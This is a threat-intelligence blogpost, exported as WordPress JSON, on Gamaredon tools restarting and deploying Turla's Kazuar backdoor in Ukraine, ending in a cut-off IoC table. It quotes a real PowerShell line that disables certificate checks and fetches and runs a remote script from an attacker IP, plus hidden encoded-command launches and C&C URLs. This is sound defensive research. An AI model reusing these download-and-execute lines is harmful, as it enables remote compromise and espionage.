{"id":241,"date":"2026-03-19T19:03:01","date_gmt":"2026-03-19T19:03:01","guid":{"rendered":"https:\/\/escudodigital.uy\/index.php\/2026\/03\/19\/gamaredon-x-turla-collab\/"},"modified":"2026-03-19T19:03:01","modified_gmt":"2026-03-19T19:03:01","slug":"gamaredon-x-turla-collab","status":"publish","type":"post","link":"https:\/\/escudodigital.uy\/index.php\/2026\/03\/19\/gamaredon-x-turla-collab\/","title":{"rendered":"Gamaredon X Turla collab"},"content":{"rendered":"<div>\n<p>In this blogpost, we uncover the first known cases of collaboration between Gamaredon and Turla, in Ukraine.<\/p>\n<blockquote>\n<p><strong>Key points of this blogpost:<\/strong><\/p>\n<ul>\n<li>In February 2025, we discovered that the Gamaredon tool PteroGraphin was used to restart Turla\u2019s Kazuar backdoor on a machine in Ukraine.<\/li>\n<li>In April and June 2025, we detected that Kazuar v2 was deployed using Gamaredon tools PteroOdd and PteroPaste.<\/li>\n<li>These discoveries lead us to believe with high confidence that Gamaredon is collaborating with Turla.<\/li>\n<li>Turla\u2019s victim count is very low compared to the number of Gamaredon compromises, suggesting that Turla choose the most valuable machines.<\/li>\n<li>Both groups are affiliated with the FSB, Russia\u2019s main domestic intelligence and security agency.<\/li>\n<\/ul>\n<\/blockquote>\n<h2>Threat actor profiles<\/h2>\n<h3>Gamaredon<\/h3>\n<p>Gamaredon has been active since at least 2013. It is responsible for many attacks, mostly against Ukrainian governmental institutions, as evidenced over time in <a href=\"https:\/\/www.rnbo.gov.ua\/en\/Diialnist\/4824.html\" target=\"_blank\" rel=\"noopener\">several reports<\/a> from <a href=\"https:\/\/cert.gov.ua\/article\/10702\" target=\"_blank\" rel=\"noopener\">CERT-UA<\/a> and from other official Ukrainian bodies. Gamaredon <a href=\"https:\/\/ssu.gov.ua\/en\/novyny\/sbu-vstanovyla-khakeriv-fsb-yaki-zdiisnyly-ponad-5-tys-kiberatak-na-derzhavni-orhany-ukrainy\" target=\"_blank\" rel=\"noopener\">has been attributed by the Security Service of Ukraine (SSU)<\/a> to the Center 18 of Information Security of the FSB, operating out of occupied Crimea. We believe this group to be collaborating with another threat actor that we discovered and named <a href=\"https:\/\/web-assets.esetstatic.com\/wls\/2020\/06\/ESET_InvisiMole.pdf\" target=\"_blank\" rel=\"noopener\">InvisiMole<\/a>.<\/p>\n<h3>Turla<\/h3>\n<p>Turla, also known as Snake, is an infamous cyberespionage group that has been active since at least 2004, possibly extending back into the late 1990s. It is thought to be part of the <a href=\"https:\/\/interaktiv.br.de\/elite-hacker-fsb\/en\/index.html\" target=\"_blank\" rel=\"noopener\">FSB<\/a>. It mainly focuses on high-profile targets, such as governments and diplomatic entities, in Europe, Central Asia, and the Middle East. It is known for having breached major organizations such as the US Department of Defense in 2008 and the Swiss defense company RUAG in 2014. During the past few years, we have documented a large part of Turla\u2019s arsenal on the WeLiveSecurity blog and in <a href=\"https:\/\/www.eset.com\/us\/business\/services\/threat-intelligence\/\" target=\"_blank\" rel=\"noopener\">private reports<\/a>.<\/p>\n<h2>Overview<\/h2>\n<p>In February 2025, via ESET telemetry, we detected four different Gamaredon-Turla co-compromises in Ukraine. On those machines, Gamaredon deployed a wide range of tools, including <a href=\"https:\/\/web-assets.esetstatic.com\/wls\/en\/papers\/white-papers\/gamaredon-in-2024.pdf\" target=\"_blank\" rel=\"noopener\">PteroLNK<\/a>, PteroStew, PteroOdd, PteroEffigy, and PteroGraphin, while Turla only deployed Kazuar v3.<\/p>\n<p>On one of those machines, we were able to capture a payload showing that Turla is able to issue commands via Gamaredon implants. PteroGraphin was used to restart Kazuar, possibly after Kazuar crashed or was not launched automatically. Thus, PteroGraphin was probably used as a recovery method by Turla. This is the first time that we have been able to link these two groups together via technical indicators (see <em><a href=\"#First chain: Restart of Kazuar v3\">First chain: Restart of Kazuar v3<\/a><\/em>).<\/p>\n<p>Because, in all four cases, the ESET endpoint product was installed after the compromises we are unable to pinpoint the exact compromise method. However, Gamaredon is known for using spearphishing and malicious LNK files on removable drives (as explained in our recent blogpost) so we presume that one of these is the most likely compromise vector.<\/p>\n<p>In April and June 2025, we detected Kazuar v2 installers being deployed directly by Gamaredon tools (see <em><a href=\"#Second chain: Deployment of Kazuar v2 via PteroOdd\">Second chain: Deployment of Kazuar v2 via PteroOdd<\/a><\/em> and <em><a href=\"#Third chain: Deployment of Kazuar v2 via PteroPaste\">Third chain: Deployment of Kazuar v2 via PteroPaste<\/a><\/em>). This shows that Turla is actively collaborating with Gamaredon to gain access to specific machines in Ukraine.<\/p>\n<h2>Victimology<\/h2>\n<p>Over the past 18 months we have detected Turla on seven machines in Ukraine. We believe that Gamaredon compromised the first four machines in January 2025, while Turla deployed Kazuar v3 in February 2025. In all cases, the ESET endpoint product was only installed after both compromises.<\/p>\n<p>It is worth noting that, prior to this, the last time we detected a Turla compromise in Ukraine was in February 2024.<\/p>\n<p>All those elements, and the fact that Gamaredon is compromising hundreds if not thousands of machines, suggest that Turla is interested only in specific machines, probably ones containing highly sensitive intelligence.<\/p>\n<h3>Attribution<\/h3>\n<h4>Gamaredon<\/h4>\n<p>In those compromises, we detected PteroLNK, PteroStew, and PteroGraphin, which we believe are exclusive to Gamaredon.<\/p>\n<h4>Turla<\/h4>\n<p>Similarly, for Turla, we detected the use of Kazuar v2 and Kazuar v3, which we believe are exclusive to that group.<\/p>\n<h3>Gamaredon-Turla collaboration hypotheses<\/h3>\n<p>In 2020, we showed that Gamaredon provided access to InvisiMole (see our <a href=\"https:\/\/web-assets.esetstatic.com\/wls\/2020\/06\/ESET_InvisiMole.pdf\">white paper<\/a>), so it is not the first time that Gamaredon has collaborated with another Russia-aligned threat actor.<\/p>\n<p>On the other hand, Turla is known for hijacking other threat actors\u2019 infrastructure to get an initial foothold in its targets\u2019 networks. Over the past years, several cases have been publicly documented:<\/p>\n<ul>\n<li>In 2019, Symantec published a <a href=\"https:\/\/www.security.com\/threat-intelligence\/waterbug-espionage-governments\">blogpost<\/a> showing that Turla hijacked OilRig (an Iran-aligned group) infrastructure to spy on a Middle Eastern target.<\/li>\n<li>In 2023, Mandiant published a <a href=\"https:\/\/cloud.google.com\/blog\/topics\/threat-intelligence\/turla-galaxy-opportunity\/\">blogpost<\/a> showing that Turla reregistered expired Andromeda C&amp;C domains in order to compromise targets in Ukraine.<\/li>\n<li>In 2024, Microsoft published two blogposts (<a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2024\/12\/04\/frequent-freeloader-part-i-secret-blizzard-compromising-storm-0156-infrastructure-for-espionage\/\">first<\/a> and <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2024\/12\/11\/frequent-freeloader-part-ii-russian-actor-secret-blizzard-using-tools-of-other-groups-to-attack-ukraine\/\">second<\/a>) showing that Turla hijacked the cybercrime botnet Amadey and infrastructure of the cyberespionage group SideCopy (a Pakistan-aligned group) in order to deploy Kazuar.<\/li>\n<\/ul>\n<p>Note that both Gamaredon and Turla are part of the Russian Federal Security Service (FSB). Gamaredon is thought to be operated by officers of Center 18 of the FSB (aka the Center for Information Security) in Crimea (see <a href=\"https:\/\/ssu.gov.ua\/en\/novyny\/sbu-vstanovyla-khakeriv-fsb-yaki-zdiisnyly-ponad-5-tys-kiberatak-na-derzhavni-orhany-ukrainy\">this report<\/a> from the Security Service of Ukraine), which is part of the FSB\u2019s counterintelligence service. As for Turla, the <a href=\"https:\/\/www.gov.uk\/government\/publications\/russias-fsb-malign-cyber-activity-factsheet\/russias-fsb-malign-activity-factsheet\">UK\u2019s NCSC<\/a> attributes the group to the Center 16 of the FSB, which is Russia\u2019s main signals intelligence (SIGINT) agency.<\/p>\n<p>Therefore, we propose three hypotheses to explain our observations:<\/p>\n<ul>\n<li><strong>Very likely<\/strong>: Given that both groups are part of the Russian FSB (though in two different Centers), Gamaredon provided access to Turla operators so that they could issue commands on a specific machine to restart Kazuar, and deploy Kazuar v2 on some others.<\/li>\n<li><strong>Unlikely<\/strong>: Turla compromised Gamaredon infrastructure and leveraged this access to recover access on a machine in Ukraine. Since PteroGraphin contains a hardcoded token that allows modifying the C&amp;C pages, this possibility cannot be fully discarded. However, it implies that Turla was able to reproduce the full Gamaredon chain.<\/li>\n<li><strong>Unlikely<\/strong>: Gamaredon has access to Kazuar and deploys it on very specific machines. Given Gamaredon\u2019s noisy approach, we don\u2019t think it would be that careful deploying Kazuar on only a very limited set of victims.<\/li>\n<\/ul>\n<h3>Geopolitical context<\/h3>\n<p>From an organizational perspective, it is worth noting that the two entities commonly associated with Turla and Gamaredon have a long history of reported collaboration, which can be traced back to the Cold War era.<\/p>\n<p>The FSB\u2019s Center 16 (which is believed to harbor Turla) is <a href=\"https:\/\/cepa.org\/comprehensive-reports\/russian-cyberwarfare-unpacking-the-kremlins-capabilities\/\">a direct heir<\/a> to the KGB\u2019s 16<sup>th<\/sup> Directorate, which was mainly responsible for foreign SIGINT collection \u2013 the persistence of the number 16 is in fact regarded by observers as a sign of the FSB leadership\u2019s desire to emphasize <a href=\"https:\/\/checkfirst.network\/wp-content\/uploads\/2025\/07\/OSINT_Phaleristics_Unveiling_FSB_16th_Center_SIGINT_Capabilities.pdf\">a historical lineage<\/a>. Center 18 (which is generally associated with Gamaredon) maintains a rough affiliation with the KGB\u2019s 2<sup>nd<\/sup> Chief Directorate, which was responsible for internal security within the Soviet Union. During the Soviet era, both organizations frequently worked hand in hand, sharing responsibilities for <a href=\"https:\/\/irp.fas.org\/world\/russia\/riehle.pdf#page=239\">monitoring foreign embassies<\/a> on Russian soil for instance.<\/p>\n<p>Then and now, such collaborations reflect the Russian strategic culture and philosophy of a natural continuity between internal security and national defense. Although Center 16 is still tasked with foreign intelligence collection and Center 18 is theoretically part of the FSB\u2019s counterintelligence apparatus, both entities seem to maintain some mission overlaps \u2013 especially with regard to former Soviet republics. In 2018, the Security Service of Ukraine (SBU) had already observed Centers 16 and 18 apparently conducting <a href=\"https:\/\/go.crowdstrike.com\/rs\/281-OBQ-266\/images\/Report2019GlobalThreatReport.pdf\">a joint cyberespionage campaign<\/a> (named SpiceyHoney). The 2022 full-scale invasion of Ukraine has probably reinforced this convergence, with ESET data clearly showing Gamaredon and Turla activities focusing on the Ukrainian defense sector in recent months.<\/p>\n<p>Although the Russian intelligence community is known for its <a href=\"https:\/\/ecfr.eu\/publication\/putins_hydra_inside_russias_intelligence_services\/\">fierce internal rivalries<\/a>, there are indications that such tensions chiefly apply to interservice relations rather than to intra-agency interactions. In this context, it is perhaps not entirely surprising that APT groups operating within these two FSB Centers are observed cooperating to some extent.<\/p>\n<h2>First chain: Restart of Kazuar v3<a id=\"First chain: Restart of Kazuar v3\"\/><\/h2>\n<p>In February 2025, we detected the execution of Kazuar by PteroGraphin and PteroOdd on a machine in Ukraine. In this section we detail the exact chain that we detected.<\/p>\n<h3>Timeline<\/h3>\n<p>The overall timeline for this machine is the following:<\/p>\n<ul>\n<li>2025-01-20: Gamaredon deployed PteroGraphin on the machine. Note that the date is from the file creation timestamp provided by Windows, which could have been tampered with.<\/li>\n<li>2025-02-11: Turla deployed Kazuar v3 on the machine. Note that the date is from the file creation timestamp provided by Windows, which could have been tampered with.<\/li>\n<li>2025-02-27 15:47:39 UTC: PteroGraphin downloaded PteroOdd.<\/li>\n<li>2025-02-27 15:47:56 UTC: PteroOdd downloaded a payload, which executed Kazuar.<\/li>\n<li>2025-02-28 15:17:14 UTC: PteroOdd downloaded another payload, which also executed Kazuar.<\/li>\n<\/ul>\n<p>Hereafter, we assume these dates to be unaltered.<\/p>\n<h3>Details of the events<\/h3>\n<p>Since January 20<sup>th<\/sup>, 2025, PteroGraphin (see Figure 1) was present on the machine at <span style=\"font-family: courier new, courier, monospace;\">%APPDATA%\\x86.ps1<\/span>. It is a downloader that provides an encrypted channel for delivering payloads via <a href=\"https:\/\/telegra.ph\/\" target=\"_blank\" rel=\"noopener\">Telegra.ph<\/a>, a web service operated by Telegram that enables easy creation of web pages. Note that PteroGraphin contains a token to edit the Telegra.ph page, so anyone with knowledge of this token (Turla, for example, though unlikely) could manipulate the contents.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 1. PteroGraphin (token partially redacted)\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gamaredon-x-turla\/figure-1.jpeg\" alt=\"Figure 1. PteroGraphin (token partially redacted)\" width=\"\" height=\"\"\/><figcaption><em>Figure 1. PteroGraphin (token partially redacted)<\/em><\/figcaption><\/figure>\n<p>On February 27<sup>th<\/sup>, 2025, at 15:47:39 UTC, as shown in Figure 2, we detected a reply from <span style=\"font-family: courier new, courier, monospace;\">https:\/\/api.telegra[.]ph\/getPage\/SecurityHealthSystray-01-20?return_content=true<\/span>.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 2. Beautified JSON reply\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gamaredon-x-turla\/figure-2.png\" alt=\"Figure 2. Beautified JSON reply\" width=\"\" height=\"\"\/><figcaption><em>Figure 2. Beautified JSON reply<\/em><\/figcaption><\/figure>\n<p>The data in <span style=\"font-family: courier new, courier, monospace;\">children<\/span> can be decrypted using the hardcoded 3DES key and IV from the PteroGraphin script above, which gives:<\/p>\n<p><span style=\"font-family: courier new, courier, monospace;\">powershell -windowStyle hidden -EncodedCommand <base64-encoded_payload\/><\/span><\/p>\n<p>The decoded payload is another PowerShell downloader that we named PteroOdd, shown in Figure 3.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 3. PteroOdd\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gamaredon-x-turla\/figure-3.png\" alt=\"Figure 3. PteroOdd\" width=\"\" height=\"\"\/><figcaption><em>Figure 3. PteroOdd<\/em><\/figcaption><\/figure>\n<p>On February 27<sup>th<\/sup>, 2025 at 15:47:56 UTC, we detected a request to <span style=\"font-family: courier new, courier, monospace;\">https:\/\/api.telegra[.]ph\/getPage\/dinoasjdnl-02-27?return_content=true<\/span>; the reply\u00a0is shown in Figure 4. Note that the replies for PteroOdd are not encrypted.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 4. PteroOdd JSON reply (beautified and partially redacted)\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gamaredon-x-turla\/figure-4.png\" alt=\"Figure 4. PteroOdd JSON reply (beautified and partially redacted)\" width=\"\" height=\"\"\/><figcaption><em>Figure 4. PteroOdd JSON reply (beautified and partially redacted)<\/em><\/figcaption><\/figure>\n<p>The decoded command is shown in Figure 5.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 5. Decoded PowerShell command (username redacted)\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gamaredon-x-turla\/figure-5.png\" alt=\"Figure 5. Decoded PowerShell command (username redacted)\" width=\"\" height=\"\"\/><figcaption><em>Figure 5. Decoded PowerShell command (username redacted)<\/em><\/figcaption><\/figure>\n<p>The payload first uploads the victim\u2019s computer name and system drive\u2019s volume serial number to the Cloudflare worker subdomain <span style=\"font-family: courier new, courier, monospace;\">https:\/\/lucky-king-96d6.mopig92456.workers[.]dev<\/span>.<\/p>\n<p>What is most interesting is the last line:<\/p>\n<p><span style=\"font-family: courier new, courier, monospace;\">Start-Process -FilePath \u00abC:\\Users\\[redacted]\\AppData\\Local\\Programs\\Sony\\Audio\\Drivers\\vncutil64.exe\u00bb<\/span><\/p>\n<p>This is the path to the application that is run to execute Kazuar by side-loading it. The ESET endpoint product detected a <span style=\"font-family: courier new, courier, monospace;\">KERNEL<\/span> Kazuar v3 payload (<span style=\"font-family: courier new, courier, monospace;\">agent_label<\/span> is <span style=\"font-family: courier new, courier, monospace;\">AGN-RR-01<\/span>) in memory and loaded from this process. It is not clear to us why Turla operators had to use PteroGraphin to launch Kazuar, but it is possible that Kazuar somehow stopped working after the ESET product installation and that they had to restart the implant. Note that we didn\u2019t see Gamaredon downloading Kazuar; it was present on the system since February 11<sup>th<\/sup>, 2025, before the ESET product was installed.<\/p>\n<p>Then, on February 28<sup>th<\/sup>, 2025 at 15:17:14 UTC, we detected another similar PowerShell script, shown in Figure 6.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 6. Second PowerShell command executing Kazuar\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gamaredon-x-turla\/figure-6.png\" alt=\"Figure 6. Second PowerShell command executing Kazuar\" width=\"\" height=\"\"\/><figcaption><em>Figure 6. Second PowerShell command executing Kazuar<\/em><\/figcaption><\/figure>\n<p>The first lines and the Cloudflare worker subdomain are identical. It starts the same <span style=\"font-family: courier new, courier, monospace;\">vncutil64.exe<\/span> but also a second executable, <span style=\"font-family: courier new, courier, monospace;\">LaunchGFExperience.exe<\/span>, which side-loads <span style=\"font-family: courier new, courier, monospace;\">LaunchGFExperienceLOC.dll<\/span> \u2013 the Kazuar loader. We then detected in memory, in the <span style=\"font-family: courier new, courier, monospace;\">LaunchGFExperience.exe<\/span> process, another <span style=\"font-family: courier new, courier, monospace;\">KERNEL<\/span> Kazuar v3 payload (<span style=\"font-family: courier new, courier, monospace;\">agent_label<\/span> is <span style=\"font-family: courier new, courier, monospace;\">AGN-XX-01<\/span>). It is not clear why two different <span style=\"font-family: courier new, courier, monospace;\">KERNEL<\/span> Kazuar v3 payloads were present on the same machine.<\/p>\n<p>Finally, an HTTP POST request, with the list of running processes, was sent to <span style=\"font-family: courier new, courier, monospace;\">https:\/\/eset.ydns[.]eu\/post.php<\/span>. The Turla operators most likely wanted confirmation that Kazuar was successfully launched.<\/p>\n<p>On March 10<sup>th<\/sup>, 2025 at 07:05:32 UTC, we detected another sample of PteroOdd, which uses the C&amp;C URL <span style=\"font-family: courier new, courier, monospace;\">https:\/\/api.telegra[.]ph\/getPage\/canposgam-03-06?return_content=true<\/span>. This sample was detected on a different machine in Ukraine, on which Kazuar was also present.<\/p>\n<p>The decoded payload is shown in Figure 7 and shows that it also uses <span style=\"font-family: courier new, courier, monospace;\">eset.ydns[.]eu<\/span>, while not interacting with any Turla sample.<\/p>\n<p>On the other hand, we noted that the downloaded payload uploads the following pieces of information to <span style=\"font-family: courier new, courier, monospace;\">https:\/\/eset.ydns[.]eu\/post.php<\/span>:<\/p>\n<p>However, we are not aware of any .NET tool that is currently being used by Gamaredon, while there are several of them used by Turla, including Kazuar. Thus, it is possible that these uploaded pieces of information are for Turla, and we assess with medium confidence that the domain <span style=\"font-family: courier new, courier, monospace;\">eset.ydns[.]eu<\/span> is controlled by Turla.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 7. PteroOdd sample\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gamaredon-x-turla\/figure-7.png\" alt=\"Figure 7. PteroOdd sample\" width=\"\" height=\"\"\/><figcaption><em>Figure 7. PteroOdd sample<\/em><\/figcaption><\/figure>\n<p>The additional base64-encoded PowerShell command is a new downloader that abuses <span style=\"font-family: courier new, courier, monospace;\">api.gofile[.]io<\/span>; we named it PteroEffigy.<\/p>\n<h3>Kazuar v3<\/h3>\n<p>Kazuar v3 is the latest branch of the Kazuar family, itself an advanced C# espionage implant that we believe is used exclusively by Turla since it was first seen in 2016. Kazuar v2 and v3 are fundamentally the same malware family and share the same codebase. However, some major changes have been introduced.<\/p>\n<p>Kazuar v3 comprises around 35% more C# lines than Kazuar v2 and introduces additional network transport methods: over web sockets and Exchange Web Services. Kazuar v3 can have one of three roles (<span style=\"font-family: courier new, courier, monospace;\">KERNEL<\/span>, <span style=\"font-family: courier new, courier, monospace;\">BRIDGE<\/span>, or <span style=\"font-family: courier new, courier, monospace;\">WORKER<\/span>), and malware functionalities are divided among those roles. For example, only <span style=\"font-family: courier new, courier, monospace;\">BRIDGE<\/span> communicates with the C&amp;C server.<\/p>\n<h2>Second chain: Deployment of Kazuar v2 via PteroOdd<a id=\"Second chain: Deployment of Kazuar v2 via PteroOdd\"\/><\/h2>\n<p>On one of the Ukrainian machines mentioned in the previous section, we detected another interesting compromise chain on April 18<sup>th<\/sup>, 2025.<\/p>\n<p>On April 18<sup>th<\/sup>, 2025 at 15:26:14 UTC, we detected a PteroOdd sample (a Gamaredon tool) downloading a payload from <span style=\"font-family: courier new, courier, monospace;\">https:\/\/api.telegra[.]ph\/getPage\/scrsskjqwlbw-02-28?return_content=true<\/span>. The downloaded script, shown in Figure 8, is similar to the payload described in the first chain, but contains an additional base64-encoded script, which is the PowerShell downloader PteroEffigy.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 8. Payload downloaded by PteroOdd\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gamaredon-x-turla\/figure-8-1.png\" alt=\"Figure 8. Payload downloaded by PteroOdd (1)\" width=\"\" height=\"\"\/><figcaption><em>Figure 8. Payload downloaded by PteroOdd<\/em><\/figcaption><\/figure>\n<p>This PowerShell payload downloads another payload from <span style=\"font-family: courier new, courier, monospace;\">https:\/\/eset.ydns[.]eu\/scrss.ps1<\/span> and executes it.<\/p>\n<p><span style=\"font-family: courier new, courier, monospace;\">scrss.ps1<\/span> turned out to be an installer for Turla\u2019s Kazuar v2, which was previously analyzed in detail by <a href=\"https:\/\/unit42.paloaltonetworks.com\/pensive-ursa-uses-upgraded-kazuar-backdoor\/\" target=\"_blank\" rel=\"noopener\">Unit42<\/a>. This shows that Gamaredon deployed Kazuar, most likely on behalf of Turla.<\/p>\n<p>The Kazuar <span style=\"font-family: courier new, courier, monospace;\">agent_label<\/span> is <span style=\"font-family: courier new, courier, monospace;\">AGN-AB-26<\/span> and the three C&amp;C servers are:<\/p>\n<ul>\n<li><span style=\"font-family: courier new, courier, monospace;\">https:\/\/abrargeospatial[.]ir\/wp-includes\/fonts\/wp-icons\/index.php<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">https:\/\/www.brannenburger-nagelfluh[.]de\/wp-includes\/style-engine\/css\/index.php<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">https:\/\/www.pizzeria-mercy[.]de\/wp-includes\/images\/media\/bar\/index.php<\/span><\/li>\n<\/ul>\n<p>It is worth noting that Turla keeps using compromised WordPress servers as C&amp;Cs for Kazuar.<\/p>\n<p>Interestingly, it seems that Kazuar v2 is still maintained in parallel to Kazuar v3. For example, the recent updates to the backdoor commands in Kazuar v3 are also included in this <span style=\"font-family: courier new, courier, monospace;\">AGN-AB-26<\/span> version.<\/p>\n<h2>Third chain: Deployment of Kazuar v2 via PteroPaste<a id=\"Third chain: Deployment of Kazuar v2 via PteroPaste\"\/><\/h2>\n<p>On June 5<sup>th<\/sup> and 6<sup>th<\/sup>, 2025, we detected Gamaredon deploying a Turla implant on two machines in Ukraine. In both cases, Gamaredon\u2019s PteroPaste was caught trying to execute the simple PowerShell script shown in Figure 9.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 9. PowerShell script executed by PteroPaste\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gamaredon-x-turla\/figure-9-1.png\" alt=\"Figure 9. PowerShell script executed by PteroPaste (1)\" width=\"\" height=\"\"\/><figcaption><em>Figure 9. PowerShell script executed by PteroPaste<\/em><\/figcaption><\/figure>\n<p>The base64-encoded string is the following downloader in PowerShell:<\/p>\n<p><span style=\"font-family: courier new, courier, monospace;\">[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};iex(New-Object Net.WebClient).downloadString(&#8216;https:\/\/91.231.182[.]187\/ekrn.ps1&#8217;);<\/span><\/p>\n<p>The downloaded script <span style=\"font-family: courier new, courier, monospace;\">ekrn.ps1<\/span> is very similar to <span style=\"font-family: courier new, courier, monospace;\">scrss.ps1<\/span> mentioned in the second chain. This also drops and installs Kazuar v2.<\/p>\n<p>Both samples have an <span style=\"font-family: courier new, courier, monospace;\">agent_label<\/span> of <span style=\"font-family: courier new, courier, monospace;\">AGN-AB-27<\/span> and the C&amp;C servers are the same as those in the sample from the second chain:<\/p>\n<ul>\n<li><span style=\"font-family: courier new, courier, monospace;\">https:\/\/www.brannenburger-nagelfluh[.]de\/wp-includes\/style-engine\/css\/index.php<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">https:\/\/www.pizzeria-mercy[.]de\/wp-includes\/images\/media\/bar\/index.php<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">https:\/\/abrargeospatial[.]ir\/wp-includes\/fonts\/wp-icons\/index.php<\/span><\/li>\n<\/ul>\n<p><span style=\"font-family: courier new, courier, monospace;\">ekrn.exe<\/span> is a legitimate process of ESET endpoint security products. Thus, Turla probably tried to masquerade as it in order to fly under the radar. Also note that <span style=\"font-family: courier new, courier, monospace;\">ekrn.ydns[.]eu<\/span> resolves to <span style=\"font-family: courier new, courier, monospace;\">91.231.182[.]187<\/span>.<\/p>\n<p>Finally, we also found on <a href=\"https:\/\/www.virustotal.com\/gui\/file\/3ecb09e659bcb500f9f40d022579a09acb11aec3a92c03e7d3fd2e56982d9eea\" target=\"_blank\" rel=\"noopener\">VirusTotal<\/a> a VBScript variant of the Kazuar v2 PowerShell installer. It was uploaded from Kyrgyzstan on June 5<sup>th<\/sup>, 2025. This suggests that Turla is interested in targets outside of Ukraine as well.<\/p>\n<h2>Conclusion<\/h2>\n<p>In this blogpost, we have shown how Turla was able to leverage implants operated by Gamaredon (PteroGraphin, PteroOdd, and PteroPaste) in order to restart Kazuar v3 and deploy Kazuar v2 on several machines in Ukraine. We now believe with high confidence that both groups \u2013 separately associated with the FSB \u2013 are cooperating and that Gamaredon is providing initial access to Turla.<\/p>\n<blockquote>\n<div><em>For any inquiries about our research published on WeLiveSecurity, please contact us at threatintel@eset.com.\u00a0<\/em><\/div>\n<div><em>ESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit the <a href=\"https:\/\/www.eset.com\/int\/business\/services\/threat-intelligence\/?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=wls-research&amp;utm_content=gamaredon-x-turla-collab&amp;sfdccampaignid=7011n0000017htTAAQ\" target=\"_blank\" rel=\"noopener\">ESET Threat Intelligence<\/a> page.<\/em><\/div>\n<\/blockquote>\n<h2>IoCs<\/h2>\n<p>A comprehensive list of indicators of compromise (IoCs) and samples can be found in our <a href=\"https:\/\/github.com\/eset\/malware-ioc\/tree\/master\/turla\">GitHub repository<\/a>.<\/p>\n<h3>Files<\/h3>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"179\"><strong>SHA-1<\/strong><\/td>\n<td width=\"123\"><strong>Filename<\/strong><\/td>\n<td width=\"180\"><strong>Detection<\/strong><\/td>\n<td width=\"161\"><strong>Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">7DB790F75829D3E6207D<wbr\/>8EC1CBCD3C133F596D67<\/span><\/td>\n<td width=\"123\">N\/A<\/td>\n<td width=\"180\">PowerShell\/Pterodo.QB<\/td>\n<td width=\"161\">PteroOdd.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">2610A899FE73B8F018D1<wbr\/>9B50BE55D66A6C78B2AF<\/span><\/td>\n<td width=\"123\">N\/A<\/td>\n<td width=\"180\">PowerShell\/Pterodo.QB<\/td>\n<td width=\"161\">PteroOdd.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">3A24520566BBE2E262A2<wbr\/>911E38FD8130469BA830<\/span><\/td>\n<td width=\"123\">N\/A<\/td>\n<td width=\"180\">PowerShell\/Pterodo.QB<\/td>\n<td width=\"161\">PteroOdd.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">DA7D5B9AB578EF648747<wbr\/>3180B975A4B2701FDA9E<\/span><\/td>\n<td width=\"123\"><span style=\"font-family: courier new, courier, monospace;\">scrss.ps1<\/span><\/td>\n<td width=\"180\">PowerShell\/Turla.AI<\/td>\n<td width=\"161\">Kazuar v2 installer.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">D7DF1325F66E029F4B77<wbr\/>E211A238AA060D7217ED<\/span><\/td>\n<td width=\"123\">N\/A<\/td>\n<td width=\"180\">MSIL\/Turla.N.gen<\/td>\n<td width=\"161\">Kazuar v2.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">FF741330CC8D9624D791<wbr\/>DE9074086BBFB0E257DC<\/span><\/td>\n<td width=\"123\">N\/A<\/td>\n<td width=\"180\">PowerShell\/TrojanDo<wbr\/>wnloader.Agent.DV<\/td>\n<td width=\"161\">PowerShell downloader executed by PteroPaste.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">A7ACEE41D66B537D9004<wbr\/>03F0E6A26AB6A1290A32<\/span><\/td>\n<td width=\"123\"><span style=\"font-family: courier new, courier, monospace;\">ekrn.ps1<\/span><\/td>\n<td width=\"180\">PowerShell\/Turla.AJ<\/td>\n<td width=\"161\">Kazuar v2 installer.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">54F2245E0D3ADEC566E4<wbr\/>D822274623BF835E170C<\/span><\/td>\n<td width=\"123\">N\/A<\/td>\n<td width=\"180\">MSIL\/Agent_AGen.CZQ<\/td>\n<td width=\"161\">Kazuar v2.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, 